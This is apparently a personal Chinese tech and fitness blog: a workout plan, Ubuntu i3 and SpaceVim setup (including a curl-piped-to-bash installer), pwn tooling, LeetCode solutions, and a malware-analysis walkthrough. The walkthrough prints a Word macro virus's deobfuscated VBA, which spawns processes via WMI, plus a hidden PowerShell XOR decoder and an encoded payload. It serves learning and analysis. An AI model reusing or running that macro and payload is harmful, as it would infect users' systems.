2020-10-05

index

童帅的博客罢了

童帅 2020-10-5

2021-11-03

训练计划第二版

经过TFA(TongS Fitness Association ，童帅健康协会)成员的讨论协商，一致决定，由于之前的健身计划存在一些问题，制定并采用新的健身计划，制定过程如下

存在的问题

由于周期是5天，所以总会和一些课程、事情冲突，导致训练延期
每个周期内手臂只能训练一次(20分钟)，训练量不足
胸背虽然是用健身器材训练的，但是没有个标准容易放松，训练效果不太好

目标

每个周期至少无氧5天，剩下两天可以无氧或休息
每天训练35分钟以上，1小时以下(一小时以上肌肉分解)
以一周为周期
大肌群(胸背腿)至少休息72小时，小肌群(手臂腰腹)至少休息48小时

计划

周一

哑铃手臂轰炸

3D肩部轰炸

周二

健身房力量强化·腿

腹肌撕裂者强化

周三

家庭增肌特训·铠甲胸

全身拉伸

周四

家庭增肌特训·V型背

周五

哑铃手臂轰炸

腹肌塑造强化

周六、周日

羽毛球/游泳/拳击/跑步/休息任选其一

新计划存在的问题

特别想练那个徒手胸肌强化(花式俯卧撑)，现在的安排无法，后面新训练计划时再弄
~~家庭增肌特训需要通过改变哑铃重量改变强度，逐渐适应~~
~~测试营养摄入的量~~

关于我们

TFA是TFA，下次制定新计划应该在应该制定新计划的时候，如果这次制定的计划合理应该可以坚持一个合理的时间，如果不合理那这次的计划一定是不合理的。

希望这次计划能让我得到更好看的身材，就像练完这次计划一样。

2021-07-16

Ubuntu i3安装记录

保持系统最新

1	sudo apt update && sudo apt upgrade

然后打开Language Support和Additional Drivers安装中文支持和必要驱动

安装i3

1	sudo apt install i3 i3lock-fancy lightdm lightdm-settings

安装相关组件

1 2	sudo apt install compton feh nm-applet python3-pip blueman policykit-1-gnome volumeicon-alsa xfce4-power-manager vim-gtk3 proxychains4 scrot

1	sudo pip install autotiling dmenu

可选的组件包括spacevim，chromium挺好用的

然后需要删除所有其它桌面管理器的快捷键

scrot用于截屏，可以根据下面的配置文件语法自行设置快捷键

i3配置

这是一份从manjaro-i3的配置文件中更改而来的文件，

# i3 config file (v4)
# Please see http://i3wm.org/docs/userguide.html for a complete reference!

# Set mod key (Mod1=<Alt>, Mod4=<Super>)
set $mod Mod4

# set default desktop layout (default is tiling)
# workspace_layout tabbed <stacking|tabbed>

# Configure border style <normal|1pixel|pixel xx|none|pixel>
default_border pixel 1
default_floating_border normal

# Hide borders
hide_edge_borders none

# change borders
bindsym $mod+u border none
bindsym $mod+y border pixel 1
bindsym $mod+n border normal

# Font for window titles. Will also be used by the bar unless a different font
# is used in the bar {} block below.
font xft:URWGothic-Book 11

# Use Mouse+$mod to drag floating windows
floating_modifier $mod

# start a terminal
bindsym $mod+Return exec gnome-terminal

# kill focused window
bindsym $mod+Shift+q kill

# start program launcher
bindsym $mod+d exec --no-startup-id dmenu_run

# launch categorized menu
bindsym $mod+z exec --no-startup-id morc_menu

################################################################################################
## sound-section - DO NOT EDIT if you wish to automatically upgrade Alsa -> Pulseaudio later! ##
################################################################################################

exec --no-startup-id volumeicon
bindsym $mod+Ctrl+m exec terminal -e 'alsamixer'
#exec --no-startup-id pulseaudio
#exec --no-startup-id pa-applet
#bindsym $mod+Ctrl+m exec pavucontrol

################################################################################################

# Screen brightness controls
# bindsym XF86MonBrightnessUp exec "xbacklight -inc 10; notify-send 'brightness up'"
# bindsym XF86MonBrightnessDown exec "xbacklight -dec 10; notify-send 'brightness down'"

# Start Applications
bindsym $mod+Ctrl+b exec terminal -e 'bmenu'
# bindsym $mod+F2 exec palemoon
# bindsym $mod+F3 exec pcmanfm
# bindsym $mod+F3 exec ranger
# bindsym $mod+Shift+F3 exec pcmanfm_pkexec
# bindsym $mod+F5 exec terminal -e 'mocp'
#bindsym $mod+t exec --no-startup-id pkill picom
#bindsym $mod+Ctrl+t exec --no-startup-id picom -b
bindsym $mod+Shift+d --release exec "killall dunst; exec notify-send 'restart dunst'"
bindsym Print exec --no-startup-id i3-scrot
bindsym $mod+Print --release exec --no-startup-id i3-scrot -w
bindsym $mod+Shift+Print --release exec --no-startup-id i3-scrot -s
bindsym $mod+Shift+h exec xdg-open /usr/share/doc/manjaro/i3_help.pdf
bindsym $mod+Ctrl+x --release exec --no-startup-id xkill

# focus_follows_mouse no

# change focus
bindsym $mod+j focus left
bindsym $mod+k focus down
bindsym $mod+l focus up
bindsym $mod+semicolon focus right

# alternatively, you can use the cursor keys:
bindsym $mod+Left focus left
bindsym $mod+Down focus down
bindsym $mod+Up focus up
bindsym $mod+Right focus right

# move focused window
bindsym $mod+Shift+j move left
bindsym $mod+Shift+k move down
bindsym $mod+Shift+l move up
bindsym $mod+Shift+semicolon move right

# alternatively, you can use the cursor keys:
bindsym $mod+Shift+Left move left
bindsym $mod+Shift+Down move down
bindsym $mod+Shift+Up move up
bindsym $mod+Shift+Right move right

# workspace back and forth (with/without active container)
workspace_auto_back_and_forth yes
bindsym $mod+b workspace back_and_forth
bindsym $mod+Shift+b move container to workspace back_and_forth; workspace back_and_forth

# split orientation
bindsym $mod+h split h;exec notify-send 'tile horizontally'
bindsym $mod+v split v;exec notify-send 'tile vertically'
bindsym $mod+q split toggle

# toggle fullscreen mode for the focused container
bindsym $mod+f fullscreen toggle

# change container layout (stacked, tabbed, toggle split)
bindsym $mod+s layout stacking
bindsym $mod+w layout tabbed
bindsym $mod+e layout toggle split

# toggle tiling / floating
bindsym $mod+Shift+space floating toggle

# change focus between tiling / floating windows
bindsym $mod+space focus mode_toggle

# toggle sticky
bindsym $mod+Shift+s sticky toggle

# focus the parent container
bindsym $mod+a focus parent

# move the currently focused window to the scratchpad
bindsym $mod+Shift+minus move scratchpad

# Show the next scratchpad window or hide the focused scratchpad window.
# If there are multiple scratchpad windows, this command cycles through them.
bindsym $mod+minus scratchpad show

#navigate workspaces next / previous
bindsym $mod+Ctrl+Right workspace next
bindsym $mod+Ctrl+Left workspace prev

# Workspace names
# to display names or symbols instead of plain workspace numbers you can use
# something like: set $ws1 1:mail
#                 set $ws2 2:
set $ws1 1
set $ws2 2
set $ws3 3
set $ws4 4
set $ws5 5
set $ws6 6
set $ws7 7
set $ws8 8

# switch to workspace
bindsym $mod+1 workspace $ws1
bindsym $mod+2 workspace $ws2
bindsym $mod+3 workspace $ws3
bindsym $mod+4 workspace $ws4
bindsym $mod+5 workspace $ws5
bindsym $mod+6 workspace $ws6
bindsym $mod+7 workspace $ws7
bindsym $mod+8 workspace $ws8

# Move focused container to workspace
bindsym $mod+Ctrl+1 move container to workspace $ws1
bindsym $mod+Ctrl+2 move container to workspace $ws2
bindsym $mod+Ctrl+3 move container to workspace $ws3
bindsym $mod+Ctrl+4 move container to workspace $ws4
bindsym $mod+Ctrl+5 move container to workspace $ws5
bindsym $mod+Ctrl+6 move container to workspace $ws6
bindsym $mod+Ctrl+7 move container to workspace $ws7
bindsym $mod+Ctrl+8 move container to workspace $ws8

# Move to workspace with focused container
bindsym $mod+Shift+1 move container to workspace $ws1; workspace $ws1
bindsym $mod+Shift+2 move container to workspace $ws2; workspace $ws2
bindsym $mod+Shift+3 move container to workspace $ws3; workspace $ws3
bindsym $mod+Shift+4 move container to workspace $ws4; workspace $ws4
bindsym $mod+Shift+5 move container to workspace $ws5; workspace $ws5
bindsym $mod+Shift+6 move container to workspace $ws6; workspace $ws6
bindsym $mod+Shift+7 move container to workspace $ws7; workspace $ws7
bindsym $mod+Shift+8 move container to workspace $ws8; workspace $ws8
# Moving workspaces between screens
bindsym $mod+p move workspace to output right

# Open applications on specific workspaces
# assign [class="Thunderbird"] $ws1
# assign [class="Pale moon"] $ws2
# assign [class="Pcmanfm"] $ws3
# assign [class="Skype"] $ws5

# Open specific applications in floating mode
for_window [title="alsamixer"] floating enable border pixel 1
for_window [class="calamares"] floating enable border normal
for_window [class="Clipgrab"] floating enable
for_window [title="File Transfer*"] floating enable
for_window [class="fpakman"] floating enable
for_window [class="Galculator"] floating enable border pixel 1
for_window [class="GParted"] floating enable border normal
for_window [title="i3_help"] floating enable sticky enable border normal
for_window [class="Lightdm-settings"] floating enable
for_window [class="Lxappearance"] floating enable sticky enable border normal
for_window [class="Manjaro-hello"] floating enable
for_window [class="Manjaro Settings Manager"] floating enable border normal
for_window [title="MuseScore: Play Panel"] floating enable
for_window [class="Nitrogen"] floating enable sticky enable border normal
for_window [class="Oblogout"] fullscreen enable
for_window [class="octopi"] floating enable
for_window [title="About Pale Moon"] floating enable
for_window [class="Pamac-manager"] floating enable
for_window [class="Pavucontrol"] floating enable
for_window [class="qt5ct"] floating enable sticky enable border normal
for_window [class="Qtconfig-qt4"] floating enable sticky enable border normal
for_window [class="Simple-scan"] floating enable border normal
for_window [class="(?i)System-config-printer.py"] floating enable border normal
for_window [class="Skype"] floating enable border normal
for_window [class="Timeset-gui"] floating enable border normal
for_window [class="(?i)virtualbox"] floating enable border normal
for_window [class="Xfburn"] floating enable

# switch to workspace with urgent window automatically
for_window [urgent=latest] focus

# reload the configuration file
bindsym $mod+Shift+c reload

# restart i3 inplace (preserves your layout/session, can be used to upgrade i3)
bindsym $mod+Shift+r restart

# exit i3 (logs you out of your X session)
bindsym $mod+Shift+e exec "i3-nagbar -t warning -m 'You pressed the exit shortcut. Do you really want to exit i3? This will end your X session.' -b 'Yes, exit i3' 'i3-msg exit'"

# Set shut down, restart and locking features
bindsym $mod+0 mode "$mode_system"
set $mode_system (l)ock, (e)xit, switch_(u)ser, (s)uspend, (h)ibernate, (r)eboot, (Shift+s)hutdown
mode "$mode_system" {
    bindsym l exec --no-startup-id i3lock-fancy, mode "default"
    bindsym s exec --no-startup-id suspend, mode "default"
    bindsym u exec --no-startup-id i3exit switch_user, mode "default"
    bindsym e exec --no-startup-id i3exit logout, mode "default"
    bindsym h exec --no-startup-id i3exit hibernate, mode "default"
    bindsym r exec --no-startup-id reboot, mode "default"
    bindsym Shift+s exec --no-startup-id shutdown now, mode "default"

    # exit system mode: "Enter" or "Escape"
    bindsym Return mode "default"
    bindsym Escape mode "default"
}

# Resize window (you can also use the mouse for that)
bindsym $mod+r mode "resize"
mode "resize" {
        # These bindings trigger as soon as you enter the resize mode
        # Pressing left will shrink the window’s width.
        # Pressing right will grow the window’s width.
        # Pressing up will shrink the window’s height.
        # Pressing down will grow the window’s height.
        bindsym j resize shrink width 5 px or 5 ppt
        bindsym k resize grow height 5 px or 5 ppt
        bindsym l resize shrink height 5 px or 5 ppt
        bindsym semicolon resize grow width 5 px or 5 ppt

        # same bindings, but for the arrow keys
        bindsym Left resize shrink width 10 px or 10 ppt
        bindsym Down resize grow height 10 px or 10 ppt
        bindsym Up resize shrink height 10 px or 10 ppt
        bindsym Right resize grow width 10 px or 10 ppt

        # exit resize mode: Enter or Escape
        bindsym Return mode "default"
        bindsym Escape mode "default"
}

# Lock screen
bindsym $mod+9 exec --no-startup-id i3lock-fancy

##########################################
# Autostart applications #################
##########################################
# exec --no-startup-id /usr/lib/polkit-gnome/polkit-gnome-authentication-agent-1
# exec --no-startup-id nitrogen --restore; sleep 1; picom -b
# exec --no-startup-id manjaro-hello
exec_always --no-startup-id compton
exec --no-startup-id feh --bg-fill ~/Pictures/Wallpapers/wallpaper1.png
exec --no-startup-id nm-applet
exec --no-startup-id xfce4-power-manager
# exec --no-startup-id pamac-tray
# exec --no-startup-id clipit
exec_always --no-startup-id autotiling
exec --no-startup-id fcitx
exec --no-startup-id blueman-applet
# exec_always --no-startup-id sbxkb
# exec --no-startup-id start_conky_maia
# exec --no-startup-id start_conky_green
exec --no-startup-id xautolock -time 30 -locker i3lock-fancy
exec --no-startup-id /usr/lib/policykit-1-gnome/polkit-gnome-authentication-agent-1 &
# exec_always --no-startup-id ff-theme-util
# exec_always --no-startup-id fix_xcursor
# exec --no-startup-id ss-qt5

############################################################

# Color palette used for the terminal ( ~/.Xresources file )
# Colors are gathered based on the documentation:
# https://i3wm.org/docs/userguide.html#xresources
# Change the variable name at the place you want to match the color
# of your terminal like this:
# [example]
# If you want your bar to have the same background color as your 
# terminal background change the line 362 from:
# background #14191D
# to:
# background $term_background
# Same logic applied to everything else.
set_from_resource $term_background background
set_from_resource $term_foreground foreground
set_from_resource $term_color0     color0
set_from_resource $term_color1     color1
set_from_resource $term_color2     color2
set_from_resource $term_color3     color3
set_from_resource $term_color4     color4
set_from_resource $term_color5     color5
set_from_resource $term_color6     color6
set_from_resource $term_color7     color7
set_from_resource $term_color8     color8
set_from_resource $term_color9     color9
set_from_resource $term_color10    color10
set_from_resource $term_color11    color11
set_from_resource $term_color12    color12
set_from_resource $term_color13    color13
set_from_resource $term_color14    color14
set_from_resource $term_color15    color15

# Start i3bar to display a workspace bar (plus the system information i3status if available)
bar {
	i3bar_command i3bar -t
	status_command i3status
	position top

## please set your primary output first. Example: 'xrandr --output eDP1 --primary'
#	tray_output primary
#	tray_output eDP1

	bindsym button4 nop
	bindsym button5 nop
#   font xft:URWGothic-Book 11
	strip_workspace_numbers yes
	status_command exec ~/.config/i3/net-speed.sh

    colors {
        background #00000060
        statusline #ffffff
        separator  #00000060

#                      border  backgr. text
        focused_workspace  #00000060 #00000060 #009900
        active_workspace   #595B5B #353836 #008800
        inactive_workspace #595B5B #222D31 #EEE8D5
        binding_mode       #16a085 #2C2C2C #F9FAF9
        urgent_workspace   #16a085 #FDF6E3 #E5201D
    }
}

# hide/unhide i3status bar
bindsym $mod+m bar mode toggle

# Theme colors
# class                   border  backgr. text    indic.   child_border
  client.focused          #556064 #556064 #80FFF9 #FDF6E3
  client.focused_inactive #2F3D44 #2F3D44 #1ABC9C #454948
  client.unfocused        #2F3D44 #2F3D44 #1ABC9C #454948
  client.urgent           #CB4B16 #FDF6E3 #1ABC9C #268BD2
  client.placeholder      #000000 #0c0c0c #ffffff #000000 

  client.background       #2B2C2B

#############################
### settings for i3-gaps: ###
#############################

# Set inner/outer gaps
#gaps inner 14
#gaps outer -2
#
## Additionally, you can issue commands with the following syntax. This is useful to bind keys to changing the gap size.
## gaps inner|outer current|all set|plus|minus <px>
## gaps inner all set 10
## gaps outer all plus 5
#
## Smart gaps (gaps used if only more than one container on the workspace)
#smart_gaps on
#
## Smart borders (draw borders around container only if it is not the only container on this workspace) 
## on|no_gaps (on=always activate and no_gaps=only activate if the gap size to the edge of the screen is 0)
#smart_borders on
#
## Press $mod+Shift+g to enter the gap mode. Choose o or i for modifying outer/inner gaps. Press one of + / - (in-/decrement for current workspace) or 0 (remove gaps for current workspace). If you also press Shift with these keys, the change will be global for all workspaces.
#set $mode_gaps Gaps: (o) outer, (i) inner
#set $mode_gaps_outer Outer Gaps: +|-|0 (local), Shift + +|-|0 (global)
#set $mode_gaps_inner Inner Gaps: +|-|0 (local), Shift + +|-|0 (global)
#bindsym $mod+Shift+g mode "$mode_gaps"
#
#mode "$mode_gaps" {
#        bindsym o      mode "$mode_gaps_outer"
#        bindsym i      mode "$mode_gaps_inner"
#        bindsym Return mode "default"
#        bindsym Escape mode "default"
#}
#mode "$mode_gaps_inner" {
#        bindsym plus  gaps inner current plus 5
#        bindsym minus gaps inner current minus 5
#        bindsym 0     gaps inner current set 0
#
#        bindsym Shift+plus  gaps inner all plus 5
#        bindsym Shift+minus gaps inner all minus 5
#        bindsym Shift+0     gaps inner all set 0
#
#        bindsym Return mode "default"
#        bindsym Escape mode "default"
#}
#mode "$mode_gaps_outer" {
#        bindsym plus  gaps outer current plus 5
#        bindsym minus gaps outer current minus 5
#        bindsym 0     gaps outer current set 0
#
#        bindsym Shift+plus  gaps outer all plus 5
#        bindsym Shift+minus gaps outer all minus 5
#        bindsym Shift+0     gaps outer all set 0
#
#        bindsym Return mode "default"
#        bindsym Escape mode "default"
#}

附录：spacevim安装

安装

1	curl -sLf https://spacevim.org/cn/install.sh \| bash -s -- -i vim

配置文件

#=============================================================================
# dark_powered.toml --- dark powered configuration example for SpaceVim
# Copyright (c) 2016-2020 Wang Shidong & Contributors
# Author: Wang Shidong < wsdjeg at 163.com >
# URL: https://spacevim.org
# License: GPLv3
#=============================================================================

# All SpaceVim option below [option] section
[options]
# set spacevim theme. by default colorscheme layer is not loaded,
# if you want to use more colorscheme, please load the colorscheme
# layer
colorscheme = "gruvbox"
colorscheme_bg = "dark"
# Disable guicolors in basic mode, many terminal do not support 24bit
# true colors
enable_guicolors = true
# Disable statusline separator, if you want to use other value, please
# install nerd fonts
statusline_separator = "arrow"
statusline_iseparator = "arrow"
buffer_index_type = 4
enable_tabline_filetype_icon = true
enable_statusline_mode = false

# Enable autocomplete layer
[[layers]]
name = 'autocomplete'
auto_completion_return_key_behavior = "complete"
auto_completion_tab_key_behavior = "smart"

[[layers]]
name = 'shell'
default_position = 'top'
default_height = 30
[[layers]]
name="lang#python"
[[layers]]
name = "debug"


[[layers]]
name="lang#c"
enable_clang_syntax_highlight = true

[[layers]]
name = "lsp"
filetypes = [
  "c",
  "cpp"
]
[layers.override_cmd]
c = ["clangd"]
[[layers]]
name="format"

[[layers]]
name="lang#rust"
[[layers]]
name = "lsp"
filetypes = [
  "rust"
]
[layers.override_cmd]
rust = ["rls"]

[[layers]]
name="lang#markdown"
[[layers]]
name="lang#latex"

[[layers]]
  name = "colorscheme"

[options]
name = "colorscheme"
colorscheme_bg = "transparent"

附录：下载国内相关软件

wget https://dldir1.qq.com/music/clntupate/linux/deb/qqmusic_1.1.0_amd64.deb 
wget https://ime.sogouimecdn.com/202107161153/d2a8c3524aec02466092d41d25cb4e72/dl/index/1612260778/sogoupinyin_2.4.0.3469_amd64.deb
wget https://wdl1.cache.wps.cn/wps/download/ep/Linux2019/10161/wps-office_11.1.0.10161_amd64.deb
wget https://issuecdn.baidupcs.com/issue/netdisk/LinuxGuanjia/3.5.0/baidunetdisk_3.5.0_amd64.deb
wget https://d1.music.126.net/dmusic/netease-cloud-music_1.2.1_amd64_ubuntu_20190428.deb
wget https://ac8e24a1e1c7815d5d015ed5e013f532.dlied1.cdntips.net/dlied1.qq.com/qqweb/LinuxQQ/linuxqq_2.0.0-b2-1089_amd64.deb?mkey=60f12f1bb7c5a6f2&f=8951&cip=183.197.128.7&proto=https&access_type=$header_ApolloNet
wget https://az764295.vo.msecnd.net/stable/c3f126316369cd610563c75b1b1725e0679adfb3/code_1.58.2-1626302803_amd64.deb

然后安装

1	sudo dpkg -i *.deb \|\| sudo apt install --fix-broken

搜狗输入法环境变量，编辑/etc/profile，在末尾添加

1
2
3

export GTK_IM_MODULE=fcitx
export QT_IM_MODULE=fcitx
export XMODIFIERS=\@im=fcitx

卸载不必要软件

1	sudo apt autoremove gnome gnome-shell gnome-control-center

设置i3status

编辑/etc/i3status.conf

# i3status configuration file.
# see "man i3status" for documentation.

# It is important that this file is edited as UTF-8.
# The following line should contain a sharp s:
# ß
# If the above line is not correctly displayed, fix your editor first!

general {
        colors = true
        interval = 5
}

# order += "ipv6"
#order += "wireless _first_"
#order += "ethernet _first_"
#order += "battery all"
order += "disk /"
order += "load"
order += "memory"
order += "tztime local"

#wireless _first_ {
#        format_up = "W: (%quality at %essid) %ip"
#        format_down = "W: down"
#}
#
#ethernet _first_ {
#        format_up = "E: %ip (%speed)"
#        format_down = "E: down"
#}

#battery all {
#        format = "%status %percentage %remaining"
#}

disk "/" {
        format = "disk: %avail"
}

load {
        format = "cpu: %1min"
}

memory {
        format = "%used/ %total"
        threshold_degraded = "1G"
        format_degraded = "MEMORY < %available"
}

tztime local {
        format = "%Y-%m-%d %H:%M:%S"
}

2021-07-02

每日论文阅读nlp-1

原文链接 https://www.aclweb.org/anthology/2020.cl-1.2.pdf

小冰的设计有三个要点

智商：驱动各种技能的方式，小冰共拥有230种技能
情商：首先要有理解用户情感的技能，然后要针对用户自己的个人特点决定回应的文本、语气、内容，并在对话停滞时开启新的话题
优化方式：CPS（每次对话的轮数）用于优化，但是不仅仅有这一个指标。

小冰使用分层决策模型进行对话

上层马尔科夫模型决定小冰使用哪一个对话模型，然后进入下层决策

2021-06-22

软件工程周期以及文档

设计阶段

开发阶段

发布阶段

2021-04-29

pwn学习之环境搭建

系统

ubuntu16.04或ubuntu18.04，在镜像站中的ubuntu-releases目录下就有

glibc

buuoj Links->Resources网站可以吓到glibc2.23-2.31各个版本的

python

pip环境可能报错，可以尝试从bootstrap网站下载

1	curl https://bootstrap.pypa.io/get-pip.py -o get-pip.py

版本不对应时会提示对应的版本链接

glibc源码

https://packages.ubuntu.com/xenial/glibc-source

调试

1	sudo apt install gdb gdbserver gdb-multiarch qemu qemu-kvm

安装pwndbg https://github.com/pwndbg/pwndbg

1
2
3

git clone https://github.com/pwndbg/pwndbg
cd pwndbg
./setup.sh

下载好glibc源码后解压，然后在gdb中设置源码搜索路径，为了方便也可以把这句话加入.gdbinit

1	dir path_to_glibc

开发

vscode jupyter python c/c++插件

2021-04-22

每日病毒分析和leetcode-4

leetcode 363 矩形区域内不超过K的最大数值和

(直接看的题解)先穷举行，再穷举列，使用库函数可以在O(nlogn)时间复杂度内找到不超过k的数。C直接穷举列了。。

int maxSumSubmatrix(int** matrix, int matrixSize, int* matrixColSize, int k){
	int xlen=matrixSize;
	int ans=INT32_MAX;
	if(!xlen)return 0;
	int ylen=matrixColSize[0];
	if(!ylen)return 0;
	int sum[40000];
	int ss=0;
	// printf("ok\n");
	for(int i=0;i<xlen;i++){
		memset(sum,0,ylen*sizeof(int));
		for(int j=i;j<xlen;j++){
			for(int c=0;c<ylen;c++){
				sum[c]+=matrix[j][c];
				// printf("%d %d %d %d\n",i,j,c,sum[c]);
			}
			for(int c=0;c<ylen;c++){
				ss=0;
				for(int cc=c;cc<ylen;cc++){
					ss+=sum[cc];
                    // printf("%d\n",ss);
                    if(k>=ss&&k-ss<ans){
                        ans=k-ss;
                    }
				}
                
			}
		}
	}
	return k-ans;
}

368 最大整除子集

对于有序的输入数组，dp[i]表示第i个数能与前面的数构成的最大整除序列。因为除数有这个性质：如果s|d，d|c则s|c，也就是说，若arr[j]与前面的数构成一个整除序列，且arr[j]|arr[i]，则arr[i]可以与arr[j]序列中的所有数构成整除序列。这就是动态规划问题。

dp[i]初始化为1

dp[i]=dp[i]%dp[j]==0&&dp[j]>=dp[i]?dp[j]+1:dp[i];

为了记录构成最大数组的序列，还要使用last数组记录i的上一个

为了得到有序的输入，还要复习一下快排算法= =

int qSort(int *arr,int start,int end){
	int j=end,i=start+1;
	int t;
	while(i<j+1&&arr[i]<=arr[start])i++;
	for(;j>i;j--){
		if(arr[j]<=arr[start]){
			t=arr[i];
			arr[i]=arr[j];
			arr[j]=t;
			while(i<j&&arr[i]<=arr[start])i++;
		}
	}
	t=arr[i-1];
	arr[i-1]=arr[start];
	arr[start]=t;
	return i-1;
}
void quickSort(int *arr,int start,int end){
	if(start>=end)return;
	int mid=qSort(arr,start,end);
	// printf("%d %d %d\n",start,end,mid);
	quickSort(arr,start,mid);
	quickSort(arr,mid+1,end);
}
int* largestDivisibleSubset(int* nums, int numsSize, int* returnSize){
	int dp[40000];
	int last[40000];
	int maxind=0;
	dp[0]=1;
	quickSort(nums,0,numsSize-1);
	for(int i=1;i<numsSize;i++){
		int maxi=i;
		dp[i]=1;
		last[i]=i;
		for(int j=0;j<i;j++){
			if(nums[i]%nums[j]==0&&dp[j]>=dp[maxi]){
				maxi=j;
				dp[i]=dp[j]+1;
				last[i]=j;
				if(dp[maxind]<dp[i]){
					maxind=i;
				}
			}
		}
	}
	*returnSize=dp[maxind];
	int *res=(int*)malloc(sizeof(int)*dp[maxind]);
	for(int i=dp[maxind]-1;i>=0;i--){
		res[i]=nums[maxind];
		maxind=last[maxind];
	}
	return res;
}

最后时间比别人快，击败96%；内存消耗比较大，应该是两个40000的数组hhhh。换了malloc果然内存降下来了，剩下的内存消耗应该是快排递归和last数组了。

Word宏病毒样本分析

https://www.52pojie.cn/thread-1287476-1-1.html

第一次分析，详细看看步骤(虚拟机已断网)

调试宏病毒

按住shift键
点击开启宏
释放shift
按下alt+11打开宏调试器
调试宏

下面 Sub Document_Open()是入口程序

被混淆了，复制代码之后使用automateexcel.com/vba-code-indenter 格式化一下，得到如下程序

Option Explicit

Private Sub SnottineSS(ByVal a1 As Variant, ByVal a2 As Variant, ByVal a3 As Variant, ByVal a4 As Long)
    
    a1.Create Lethbridge(ActiveDocument.Variables("l26cd3c2c2f351").Value), a2, a3, a4
    
End Sub
Sub Document_Open()
    
    Dim Garniture   As Object: Set Garniture = GetObject(Lethbridge(ActiveDocument.Variables("de9a2c49a42b6").Value))
    SnottineSS Garniture, Null, Null, 0
    
End Sub
Private Function Lethbridge(ByVal Garniture As String) As String
    
    Dim Hulkier     As Long: Dim Humoursome() As Byte
    
    GoTo NoNapparitioNal
    
    Dickinson:
    
    For Hulkier = 0 To UBound(Humoursome)
        
        Humoursome(Hulkier) = Abs(Humoursome(Hulkier) - 14)
    Next
    
    GoTo SnottineSS
    Exit Function
    
    Slinky:
    
    MsgBox " Above steps are still valid."
    
    Exit Function
    NoNapparitioNal:
    
    Humoursome = StrConv(Garniture, 256 / 2, 1000 + 55)
    GoTo Dickinson
    
    Exit Function
    SnottineSS:
    
    Lethbridge = StrConv(Humoursome, 32 * 2, 1000 + 55)
    
    Exit Function
    
    GoTo Crossville
    
    Crossville:
    
    MsgBox " this solution will provide modules"
    Exit Function
End Function

在 Sub Ducument_Open()下断点，点击运行后进入debug状态

F8单步步入，到Lethbridge中

然后视图->本地窗口，监视变量，之后一直单步步入，碰到循环就执行到光标处，直到ExitFunction前，观察到解密字符串 “winmgmts:\.\root\cimv2:Win32_Process”

搜索这个Win32_Process对象，https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-tasks--processes，得到这个对象主要用来创建进程、获取进程信息

后面这个字符串传入了GetObject，然后传入了SnottineSS函数

然后又解密了一个字符串，运行后得到

1
2

"powershell -WindowStyle Hidden 
function y171e {param($z4627)$k58be9='a57157c';$yce74a='';for ($i=0; $i -lt $z4627.length;$i+=2){$vc2775=[convert]::ToByte($z4627.Substring($i,2),16);$yce74a+=[char]($vc2775 -bxor $k58be9[($i/2)%$k58be9.length]);}return "

格式化一下

# powershell -WindowStyle Hidden 
function y171e {
    param($z4627)$k58be9 = 'a57157c'; 
    $yce74a = ''; 
    for ($i = 0; $i -lt $z4627.length; $i += 2) { 
        $vc2775 = [convert]::ToByte($z4627.Substring($i, 2), 16); 
        $yce74a += [char]($vc2775 -bxor $k58be9[($i / 2) % $k58be9.length]); 
    }
    return 
}

第一条命令运行一个ps1脚本

TODO 此处没调试到powershell的真实脚本？

直接使用文章里的

powershell  Hidden 
function y171e {param($z4627)$k58be9='a57157c';$yce74a='';for ($i=0; $i -lt $z4627.length;$i+=2){$vc2775=[convert]::ToByte($z4627.Substring($i,2),16);$yce74a+=[char]($vc2775 -bxor $k58be9[($i/2)%$k58be9.length]);}return $yce74a;}
$z24c573 = '14465e5f52173018464354580c16125c595615641a1241525c1b65160f415e5c50192a0f4152435a4730044741585652105a4044585b5043324c4445505a4d255c56565b5810155c54420e4210085b5011664e1015505a1f7c785814465e5f5217301846435458192d04410c3c3f471603595e5215540f004644114c5502530c0f024e6c270d597e5c455811151d155a50450d04590403171b260f41454865580a0f410a137252173147585274530713504442171e3e1140555d5c5443124156455c5443044d4354475943285b436141454317020008571f2a0f41674547171b59510404031b1015475e5f52171556575206061e583a715b5d7c5a130e474319175c06135b525d0605414d705945474e330e5c594508152f0e54537d5c551100474e131c6a1314575b5856171015544358561706194152435b172a0f41674547170657030207510e4b124145585b50431b560154541e583a715b5d7c5a130e474319175c06135b525d0605414d705945474e330e5c594508153508474344545b33135a435456434148684744575b0a0215444554430a021552494152110f15555e5a5b43090254040d014b285b43614145430c5156060d01574d607e5f41671713155c0302550050571b445c5917414d545554515158195844411716085b4311470f5703060e180e6c270d597e5c455811151d157a50450d045904031b530f0d171b745b4311186558585b435e4367435d7858150478525c5a451a43196454417b02124172434758115c53565d46524a3c464350415e0041504f4550450d41435858511706070056541d7e0d1565434315565a550d5209197e0d15654343155b5b03040554195e0d15155005560106480e4744575b0a0215444554430a02155e5f411700500c04531d1e18285b4361414543020756540753555c500107000107581d4e0002060649170701000f5755000f0057025051530755171e4a5a5c511956050204075307140a2a0f416745471939044758184e7e0d1565434315455a57060308060a1556020e531d545100500555031b1a500206541d155151000f0501025b570302050505530702000507025454060203040641481c0c58531f11580304050c04425c7c59456543114f6f52435a1e18347c5945654311415d55505405075c1d62785b433315471e040e420a0f41175a0c5450560c0a010e5e05495d0052000f5549470e0706035a52195f535456510519074901074f0e4043115e0e0052020e181c4c211841526a68170904045255084c531906061d054f05071907490c071e5a7c5945654311415b55020700025c785643465f020d1b765d59580029725b5e57560f49061e0a785611125d565d1b740c114c1f5b5006060519071d5b55505302561d061e5804530250501f0d044217785b433315471f430c0150550c041f61582a0f4101051d1e48514d070104554a4d5b55020700024d061e0a484a1e124145585b504312040f0253565e245b415847580d0c5059451b70061573585d515211315443591d720d175c455e5b5a060f41196245520008545b775a5b070447197045470f085656455c580d255443501c174841176b6d560e51540015111e171a500206541d155707000705530257431c0c5f50404336505572595e060f411f181b730c165b5b5e545325085952194c065450501f13050e5750010405040355515103520152565700010453020154030700050f57570100050602025502070704045750015204060354540d070905035756010300530255540d075401525754000f0504060251530552040155530254050600505703020205015555000f0654035251500355050357050005131c1b10500d0457541e583147585250441032415643417e0d075a174803540153085954421733135a5454464430155445457c59050e1d44000d0405001c0c614758000446441f66430213411f48035401531c0c43504316135b17010e4a1314575b585617101554435856171015475e5f52171a500206541d4417135c5956155a06590c0e051c4c1015475e5f52171b59510404030a4100000000000000430e4445475e0d06155207030255050c0a13170c050e471f585b43430808070a155e5f0c500f080c034d2d505956415f58081e0a031c4c011841521143005458570a725a59150447431f6158211841521958525b580c031f664201124145585b504b08190518190655480e5207030255050c1c0c1d540b00471e19430054585769490d535054036c195c185148104f09510456571b7b545b501709681e0a4845061540455f155255570001550c0